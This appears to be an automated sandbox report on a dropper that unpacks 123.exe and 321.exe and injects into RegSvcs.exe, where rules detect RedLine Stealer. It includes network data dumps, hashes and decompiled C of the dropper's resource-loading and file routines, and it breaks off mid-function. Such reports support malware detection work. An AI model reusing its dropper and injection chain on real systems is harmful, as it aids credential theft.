2023-03-24 14:28:24 UTC	1680	IN	Data Raw: 62 36 2c 31 30 66 2c 31 33 32 2c 36 39 2c 37 64 2c 38 64 2c 31 31 36 2c 31 35 39 2c 61 31 2c 31 32 39 2c 39 32 2c 31 30 61 2c 31 32 64 2c 31 34 30 2c 39 30 2c 39 62 2c 36 30 2c 38 66 2c 31 30 38 2c 62 38 2c 36 35 2c 61 37 2c 63 39 2c 63 66 2c 31 30 37 2c 64 65 2c 61 30 2c 36 30 2c 38 36 2c 61 63 2c 39 61 2c 35 65 2c 31 32 38 2c 33 34 2c 31 34 31 2c 66 35 2c 62 39 2c 36 39 2c 37 35 2c 63 33 2c 61 35 2c 39 66 2c 31 32 34 2c 31 33 65 2c 61 66 2c 61 64 2c 38 63 2c 31 30 63 2c 31 34 35 2c 35 63 2c 31 30 36 2c 62 38 2c 36 35 2c 39 33 2c 31 32 31 2c 61 62 2c 35 33 2c 39 63 2c 31 35 66 2c 31 30 30 2c 38 35 2c 63 30 2c 64 30 2c 37 66 2c 66 37 2c 61 33 2c 38 62 2c 34 65 2c 62 30 2c 31 31 36 2c 61 35 2c 37 39 2c 39 35 2c 65 63 2c 31 31 39 2c 37 61 2c 62 62 2c 39 61 Data Ascii: b6,10f,132,69,7d,8d,116,159,a1,129,92,10a,12d,140,90,9b,60,8f,108,b8,65,a7,c9,cf,107,de,a0,60,86,ac,9a,5e,128,34,141,f5,b9,69,75,c3,a5,9f,124,13e,af,ad,8c,10c,145,5c,106,b8,65,93,121,ab,53,9c,15f,100,85,c0,d0,7f,f7,a3,8b,4e,b0,116,a5,79,95,ec,119,7a,bb,9a
2023-03-24 14:28:24 UTC	1696	IN	Data Raw: 37 2c 64 61 2c 38 63 2c 39 39 2c 63 33 2c 63 37 2c 65 34 2c 65 30 2c 62 38 2c 62 38 2c 62 63 2c 39 36 2c 63 33 2c 61 66 2c 37 33 2c 65 63 2c 64 61 2c 64 39 2c 61 36 2c 65 34 2c 64 39 2c 61 31 2c 37 30 2c 62 36 2c 65 32 2c 63 62 2c 36 37 2c 38 37 2c 64 37 2c 61 35 2c 61 62 2c 63 36 2c 64 39 2c 64 61 2c 38 63 2c 38 65 2c 62 63 2c 63 61 2c 65 63 2c 64 38 2c 37 35 2c 38 34 2c 37 35 2c 36 62 2c 35 65 2c 36 31 2c 37 33 2c 39 39 2c 38 35 2c 38 39 2c 35 36 2c 62 31 2c 64 61 2c 61 32 2c 63 30 2c 63 30 2c 65 32 2c 63 62 2c 62 62 2c 39 35 2c 64 32 2c 38 36 2c 39 61 2c 37 37 2c 61 62 2c 63 62 2c 61 39 2c 35 61 2c 63 65 2c 62 63 2c 61 61 2c 61 37 2c 38 36 2c 38 38 2c 37 63 2c 36 32 2c 38 62 2c 36 65 2c 38 34 2c 61 65 2c 39 39 2c 39 66 2c 36 33 2c 61 39 2c 39 61 2c 39 Data Ascii: 7,da,8c,99,c3,c7,e4,e0,b8,b8,bc,96,c3,af,73,ec,da,d9,a6,e4,d9,a1,70,b6,e2,cb,67,87,d7,a5,ab,c6,d9,da,8c,8e,bc,ca,ec,d8,75,84,75,6b,5e,61,73,99,85,89,56,b1,da,a2,c0,c0,e2,cb,bb,95,d2,86,9a,77,ab,cb,a9,5a,ce,bc,aa,a7,86,88,7c,62,8b,6e,84,ae,99,9f,63,a9,9a,9
2023-03-24 14:28:24 UTC	1712	IN	Data Raw: 2c 39 32 2c 64 61 2c 31 32 39 2c 34 31 2c 61 32 2c 31 33 36 2c 36 66 2c 31 32 31 2c 62 39 2c 31 33 61 2c 31 32 34 2c 63 35 2c 37 63 2c 35 37 2c 65 39 2c 35 61 2c 62 37 2c 37 35 2c 31 34 63 2c 66 61 2c 31 33 37 2c 39 39 2c 63 62 2c 31 35 31 2c 31 36 62 2c 35 65 2c 31 31 66 2c 35 61 2c 62 63 2c 39 36 2c 36 62 2c 37 66 2c 31 32 39 2c 39 37 2c 63 38 2c 66 37 2c 65 66 2c 62 65 2c 31 35 66 2c 31 31 66 2c 37 30 2c 31 34 33 2c 66 62 2c 66 65 2c 36 66 2c 31 30 64 2c 66 66 2c 62 65 2c 66 31 2c 31 32 64 2c 31 36 61 2c 66 61 2c 38 33 2c 31 33 66 2c 36 66 2c 31 30 33 2c 61 34 2c 39 65 2c 31 32 38 2c 31 35 33 2c 66 35 2c 39 35 2c 66 30 2c 62 30 2c 64 34 2c 62 65 2c 61 65 2c 38 33 2c 61 61 2c 63 65 2c 62 35 2c 37 66 2c 34 33 2c 63 30 2c 64 62 2c 39 66 2c 31 33 65 2c 66 Data Ascii: ,92,da,129,41,a2,136,6f,121,b9,13a,124,c5,7c,57,e9,5a,b7,75,14c,fa,137,99,cb,151,16b,5e,11f,5a,bc,96,6b,7f,129,97,c8,f7,ef,be,15f,11f,70,143,fb,fe,6f,10d,ff,be,f1,12d,16a,fa,83,13f,6f,103,a4,9e,128,153,f5,95,f0,b0,d4,be,ae,83,aa,ce,b5,7f,43,c0,db,9f,13e,f

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 6364, Parent PID: 3452

General

Target ID:	0
Start time:	15:29:06
Start date:	24/03/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xa30000
File size:	1180505 bytes
MD5 hash:	308D76F827D8624C5C933A5119569B5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 123.exePID: 2356, Parent PID: 6364

General

Target ID:	1
Start time:	15:29:07
Start date:	24/03/2023
Path:	C:\Windows\Temp\123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\123.exe"
Imagebase:	0x900000
File size:	1169408 bytes
MD5 hash:	3D8A270AF27D26831957D97353600B05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.254290933.0000000001082000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 38%, ReversingLabs Detection: 39%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 321.exePID: 3776, Parent PID: 6364

General

Target ID:	2
Start time:	15:29:08
Start date:	24/03/2023
Path:	C:\Windows\Temp\321.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\321.exe"
Imagebase:	0x1280000
File size:	2041856 bytes
MD5 hash:	3E4A296272D9389DB0A87A3723512815
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 35%, ReversingLabs Detection: 38%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 1176, Parent PID: 2356

General

Target ID:	3
Start time:	15:29:08
Start date:	24/03/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x400000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.514026259.0000000000802000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5216, Parent PID: 1176

General

Target ID:	6
Start time:	15:29:09
Start date:	24/03/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 8
Imagebase:	0xe50000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5204, Parent PID: 2356

General

Target ID:	7
Start time:	15:29:09
Start date:	24/03/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 236
Imagebase:	0xe50000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 2464, Parent PID: 3776

General

Target ID:	8
Start time:	15:29:11
Start date:	24/03/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x5e0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6648, Parent PID: 3776

General

Target ID:	10
Start time:	15:29:12
Start date:	24/03/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 216
Imagebase:	0xe50000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 6364, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	46

Executed Functions

Function 00A4A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00A4A6C2(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t27;
				char* _t34;
				void* _t36;
				void* _t38;
				intOrPtr* _t39;
				long _t44;
				intOrPtr* _t45;
				struct HRSRC__* _t46;

				_t14 = FindResourceW( *0xa71028, _a4, "PNG"); // executed
				_t46 = _t14;
				if(_t46 == 0) {
					L15:
					return 0;
				}
				_t44 = SizeofResource( *0xa71028, _t46);
				if(_t44 == 0) {
					goto L15;
				}
				_t17 = LoadResource( *0xa71028, _t46);
				if(_t17 == 0) {
					goto L15;
				}
				_t18 = LockResource(_t17);
				_t47 = _t18;
				if(_t18 == 0) {
					goto L15;
				}
				_v4 = 0;
				_t19 = GlobalAlloc(2, _t44); // executed
				_t36 = _t19;
				if(_t36 == 0) {
					L14:
					return _v4;
				}
				if(GlobalLock(_t36) == 0) {
					L13:
					GlobalFree(_t36);
					goto L14;
				}
				E00A50320(_t21, _t47, _t44);
				_v8 = 0;
				_push( &_v8);
				_push(0);
				_push(_t36);
				if( *0xa93180() == 0) {
					_t27 = E00A4A626(_t25, _t38, _v20, 0); // executed
					_t39 = _v28;
					_t45 = _t27;
					 *0xa63278(_t39);
					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 8))))();
					if(_t45 != 0) {
						 *((intOrPtr*)(_t45 + 8)) = 0;
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							_push(0xffffff);
							_t34 =  &_v20;
							_push(_t34);
							_push( *((intOrPtr*)(_t45 + 4)));
							L00A4EB26(); // executed
							if(_t34 != 0) {
								 *((intOrPtr*)(_t45 + 8)) = _t34;
							}
						}
						 *0xa63278(1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t45))))();
					}
				}
				GlobalUnlock(_t36);
				goto L13;
			}

0x00a4a6d5
0x00a4a6db
0x00a4a6df
0x00a4a7db
0x00000000
0x00a4a7db
0x00a4a6f2
0x00a4a6f6
0x00000000
0x00000000
0x00a4a703
0x00a4a70b
0x00000000
0x00000000
0x00a4a712
0x00a4a718
0x00a4a71c
0x00000000
0x00000000
0x00a4a729
0x00a4a72d
0x00a4a733
0x00a4a737
0x00a4a7d3
0x00000000
0x00a4a7d8
0x00a4a746
0x00a4a7cc
0x00a4a7cd
0x00000000
0x00a4a7cd
0x00a4a74f
0x00a4a757
0x00a4a75f
0x00a4a760
0x00a4a761
0x00a4a76a
0x00a4a771
0x00a4a776
0x00a4a77a
0x00a4a784
0x00a4a78a
0x00a4a78e
0x00a4a793
0x00a4a798
0x00a4a79a
0x00a4a79f
0x00a4a7a3
0x00a4a7a4
0x00a4a7a7
0x00a4a7ae
0x00a4a7b0
0x00a4a7b0
0x00a4a7ae
0x00a4a7bb
0x00a4a7c3
0x00a4a7c3
0x00a4a78e
0x00a4a7c6
0x00000000

APIs

FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6D5
SizeofResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6EC
LoadResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A703
LockResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A4B73D,00000066), ref: 00A4A72D
GlobalLock.KERNEL32 ref: 00A4A73E
GlobalUnlock.KERNEL32(00000000), ref: 00A4A7C6

Part of subcall function 00A4A626: GdipAlloc.GDIPLUS(00000010), ref: 00A4A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A4A7A7
GlobalFree.KERNEL32 ref: 00A4A7CD

Strings

PNG, xrefs: 00A4A6C6

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: b95bebc063b1624926898d192d023fbc2038a9b48b2a2eb6c9be5fae804eee14
Instruction ID: 2ea166f465e4a70873d2a3f5aef47e1498ba644524afcfc88ae2f76580cd959a
Opcode Fuzzy Hash: b95bebc063b1624926898d192d023fbc2038a9b48b2a2eb6c9be5fae804eee14
Instruction Fuzzy Hash: 7E31A47A640302AFDB20DF61DC48D2BBBB9FFD5751B044619F805C2620EB71DD46DA61

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00A3A69B(void* _a4, WCHAR* _a8, intOrPtr _a12) {
				intOrPtr _v572;
				intOrPtr _v580;
				intOrPtr _v588;
				struct _WIN32_FIND_DATAW _v596;
				short _v4692;
				int _t44;
				int _t49;
				signed int _t61;
				signed int _t62;
				void* _t63;
				long _t66;
				void* _t69;
				signed int _t78;
				void* _t79;
				intOrPtr _t80;
				void* _t81;

				E00A4EC50(0x1250);
				_t81 = _a4;
				_t79 = _t78 | 0xffffffff;
				_push( &_v596);
				if(_t81 != _t79) {
					_t44 = FindNextFileW(_t81, ??);
					__eflags = _t44;
					if(_t44 != 0) {
						L12:
						_t80 = _a12;
						E00A40602(_t80, _a8, 0x800);
						_push(0x800);
						E00A3C310(__eflags, _t80,  &(_v596.cFileName));
						_t49 = 0 + _v596.nFileSizeLow;
						__eflags = _t49;
						 *(_t80 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *(_t80 + 0x1008) = _v596.dwFileAttributes;
						 *((intOrPtr*)(_t80 + 0x1004)) = _v596.nFileSizeHigh;
						 *((intOrPtr*)(_t80 + 0x1028)) = _v596.ftCreationTime;
						 *((intOrPtr*)(_t80 + 0x102c)) = _v588;
						 *((intOrPtr*)(_t80 + 0x1030)) = _v596.ftLastAccessTime;
						 *((intOrPtr*)(_t80 + 0x1034)) = _v580;
						 *((intOrPtr*)(_t80 + 0x1038)) = _v596.ftLastWriteTime;
						 *((intOrPtr*)(_t80 + 0x103c)) = _v572;
						E00A415DA(_t80 + 0x1010,  &(_v596.ftLastWriteTime));
						E00A415DA(_t80 + 0x1018,  &(_v596.ftCreationTime));
						E00A415DA(_t80 + 0x1020,  &(_v596.ftLastAccessTime));
						L13:
						 *(_t80 + 0x1040) =  *(_t80 + 0x1040) & 0x00000000;
						return _t81;
					}
					_t81 = _t79;
					_t61 = GetLastError();
					__eflags = _t61 - 0x12;
					_t62 = _t61 & 0xffffff00 | _t61 != 0x00000012;
					L9:
					_t80 = _a12;
					 *(_t80 + 0x1044) = _t62;
					goto L13;
				}
				_t63 = FindFirstFileW(_a8, ??); // executed
				_t81 = _t63;
				if(_t81 != _t79) {
					goto L12;
				}
				if(E00A3BB03(_a8,  &_v4692, 0x800) == 0) {
					L4:
					_t66 = GetLastError();
					if(_t66 == 2 || _t66 == 3 || _t66 == 0x12) {
						_t62 = 0;
						__eflags = 0;
					} else {
						_t62 = 1;
					}
					goto L9;
				}
				_t69 = FindFirstFileW( &_v4692,  &_v596); // executed
				_t81 = _t69;
				if(_t81 != _t79) {
					goto L12;
				}
				goto L4;
			}

0x00a3a6a3
0x00a3a6aa
0x00a3a6b4
0x00a3a6bc
0x00a3a6bf
0x00a3a728
0x00a3a72e
0x00a3a730
0x00a3a742
0x00a3a742
0x00a3a74a
0x00a3a74f
0x00a3a758
0x00a3a765
0x00a3a765
0x00a3a76b
0x00a3a777
0x00a3a77a
0x00a3a786
0x00a3a792
0x00a3a79e
0x00a3a7aa
0x00a3a7b6
0x00a3a7c2
0x00a3a7ce
0x00a3a7db
0x00a3a7ed
0x00a3a7ff
0x00a3a804
0x00a3a804
0x00a3a811
0x00a3a811
0x00a3a732
0x00a3a734
0x00a3a73a
0x00a3a73d
0x00a3a719
0x00a3a719
0x00a3a71c
0x00000000
0x00a3a71c
0x00a3a6c4
0x00a3a6ca
0x00a3a6ce
0x00000000
0x00000000
0x00a3a6e2
0x00a3a6fe
0x00a3a6fe
0x00a3a707
0x00a3a717
0x00a3a717
0x00a3a713
0x00a3a713
0x00a3a713
0x00000000
0x00a3a707
0x00a3a6f2
0x00a3a6f8
0x00a3a6fc
0x00000000
0x00000000
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6C4

Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A728
GetLastError.KERNEL32(?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A734

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 1ed85acf21d37da803d196b7b0c91b16e4d34aaa6aae12fd8d2f150b688d748f
Instruction ID: d73ff8fa1445ea0d2ba80239bb435bedab12649af717968629178aa829a956c5
Opcode Fuzzy Hash: 1ed85acf21d37da803d196b7b0c91b16e4d34aaa6aae12fd8d2f150b688d748f
Instruction Fuzzy Hash: 35417D76900125ABCB25DF64CCC4AE9B7B8FB59350F104196F5AEE3200D7346E95CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A57DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00A57DEE(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;

				if(E00A5B076(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00A57E73(_t15, _a4);
				ExitProcess(_a4);
			}

0x00a57dfa
0x00a57e16
0x00a57e16
0x00a57e1f
0x00a57e28

APIs

GetCurrentProcess.KERNEL32(?,?,00A57DC4,?,00A6C300,0000000C,00A57F1B,?,00000002,00000000), ref: 00A57E0F
TerminateProcess.KERNEL32(00000000,?,00A57DC4,?,00A6C300,0000000C,00A57F1B,?,00000002,00000000), ref: 00A57E16
ExitProcess.KERNEL32 ref: 00A57E28

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b4149744fe7555dc41760f5575ca033404f663f863e528ea87394fa83ccc860d
Instruction ID: cb9e0e7ac2f0916cd12161801728a03b4697f4f5d7d5d2efb0f887e36dd81040
Opcode Fuzzy Hash: b4149744fe7555dc41760f5575ca033404f663f863e528ea87394fa83ccc860d
Instruction Fuzzy Hash: 7DE0BF32004244ABCF11AF54DD0A9497F79FF50342B014454FC15AA172CB75DE5BCA90

Uniqueness

Uniqueness Score: -1.00%

Function 00A3848E Relevance: 2.5, APIs: 1, Instructions: 960
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E00A3848E(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t383;
				signed int _t387;
				signed int _t392;
				signed int _t398;
				void* _t400;
				signed int _t401;
				signed int _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t411;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t442;
				signed int _t445;
				signed int _t446;
				char _t448;
				signed int _t449;
				signed int _t450;
				signed int _t473;
				signed int _t482;
				intOrPtr _t485;
				signed int _t495;
				char _t500;
				char _t501;
				void* _t508;
				void* _t515;
				void* _t517;
				signed int _t525;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t534;
				signed int _t536;
				signed int _t543;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t558;
				signed char _t559;
				signed int _t562;
				void* _t567;
				signed int _t573;
				intOrPtr* _t582;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t596;
				intOrPtr _t599;
				signed int _t602;
				signed int _t611;
				signed int _t613;
				signed int _t616;
				signed int _t619;
				signed int _t621;
				signed int _t622;
				signed int _t624;
				signed int _t625;
				signed int _t628;
				void* _t637;
				intOrPtr _t645;
				char _t646;
				signed int _t649;
				signed int _t650;
				void* _t657;
				void* _t658;
				signed int _t675;
				intOrPtr _t686;
				void* _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t692;
				signed int _t695;
				intOrPtr _t697;
				signed int _t702;
				signed int _t704;
				signed int _t707;
				void* _t712;
				signed int _t713;
				signed int _t716;
				signed int _t717;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t725;

				E00A4EB78(0xa62858, _t721);
				E00A4EC50(0x60ac);
				_t582 =  *((intOrPtr*)(_t721 + 8));
				_t684 = 0;
				_t697 = __ecx;
				 *((intOrPtr*)(_t721 - 0x1c)) = __ecx;
				_t585 =  *( *((intOrPtr*)(__ecx + 8)) + 0x92fa) & 0x0000ffff;
				 *(_t721 - 0x18) = _t585;
				if( *((intOrPtr*)(_t721 + 0xc)) != 0) {
					_t704 = __ecx + 0x10;
					 *(_t721 - 0x20) = _t704;
					L5:
					_t383 =  *((intOrPtr*)(_t582 + 0x21f4));
					if(_t383 == 2) {
						 *(_t697 + 0x10ff) = _t684;
						__eflags =  *(_t582 + 0x32f4) - _t684;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t582 + 0x32fc) - _t684;
							if(__eflags > 0) {
								L26:
								_t586 =  *(_t697 + 8);
								__eflags =  *((intOrPtr*)(_t586 + 0x7164)) - _t684;
								if( *((intOrPtr*)(_t586 + 0x7164)) != _t684) {
									L29:
									 *(_t721 - 0x13) = _t684;
									_t37 = _t721 - 0x60b8; // -22712
									_t38 = _t721 - 0x13; // 0x7ed
									_t387 = E00A35D1A(_t582 + 0x2298, _t38, 6, _t684, _t37, 0x800);
									__eflags = _t387;
									 *(_t721 - 0x11) = _t387 != 0;
									__eflags = _t387;
									if(_t387 != 0) {
										__eflags =  *(_t721 - 0x13);
										if( *(_t721 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t697 + 0xf9)) = 0;
										}
									}
									E00A32112(_t582);
									_t43 = _t721 - 0x30b8; // -10424
									E00A3B76C(_t582, _t582 + 0x22c0, _t43, 0x800);
									__eflags =  *((char*)(_t582 + 0x338b));
									 *(_t721 - 0x24) = 1;
									if( *((char*)(_t582 + 0x338b)) == 0) {
										_t392 = E00A32209(_t582);
										__eflags = _t392;
										if(_t392 == 0) {
											_t559 =  *(_t697 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t559 + 0x82c4));
											asm("sbb al, al");
											_t61 = _t721 - 0x11;
											 *_t61 =  *(_t721 - 0x11) &  !_t559;
											__eflags =  *_t61;
										}
									} else {
										_t562 =  *( *(_t697 + 8) + 0x82c4);
										__eflags = _t562 - 1;
										if(_t562 != 1) {
											__eflags =  *(_t721 - 0x13);
											if( *(_t721 - 0x13) == 0) {
												__eflags = _t562;
												 *(_t721 - 0x11) =  *(_t721 - 0x11) & (_t562 & 0xffffff00 | _t562 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t721 - 0x30b8; // -10424
												_t567 = E00A3C249(_t54);
												_t675 =  *(_t697 + 8);
												__eflags =  *((intOrPtr*)(_t675 + 0x82c4)) - 1 - _t567;
												if( *((intOrPtr*)(_t675 + 0x82c4)) - 1 != _t567) {
													 *(_t721 - 0x11) = 0;
												} else {
													_t57 = _t721 - 0x30b8; // -10424
													_push(1);
													E00A3C249(_t57);
												}
											}
										}
									}
									 *((char*)(_t697 + 0x67)) =  *((intOrPtr*)(_t582 + 0x3331));
									 *((char*)(_t697 + 0x68)) = 0;
									asm("sbb eax, [ebx+0x32f4]");
									 *0xa63278( *((intOrPtr*)(_t582 + 0x6cc0)) -  *(_t582 + 0x32f0),  *((intOrPtr*)(_t582 + 0x6cc4)), 0);
									 *((intOrPtr*)( *_t582 + 0x10))();
									_t685 = 0;
									_t398 = 0;
									_t595 = 0;
									 *(_t721 - 0xd) = 0;
									 *(_t721 - 0x28) = 0;
									__eflags =  *(_t582 + 0x3333);
									if( *(_t582 + 0x3333) == 0) {
										L44:
										__eflags =  *(_t721 - 0x11) - _t595;
										if( *(_t721 - 0x11) != _t595) {
											L47:
											_t707 =  *(_t721 - 0x18);
											_t596 =  *((intOrPtr*)( *(_t697 + 8) + 0x7201));
											_t400 = 0x49;
											__eflags = _t596;
											if(_t596 == 0) {
												L49:
												_t401 = _t685;
												L50:
												__eflags = _t596;
												_t88 = _t721 - 0x30b8; // -10424
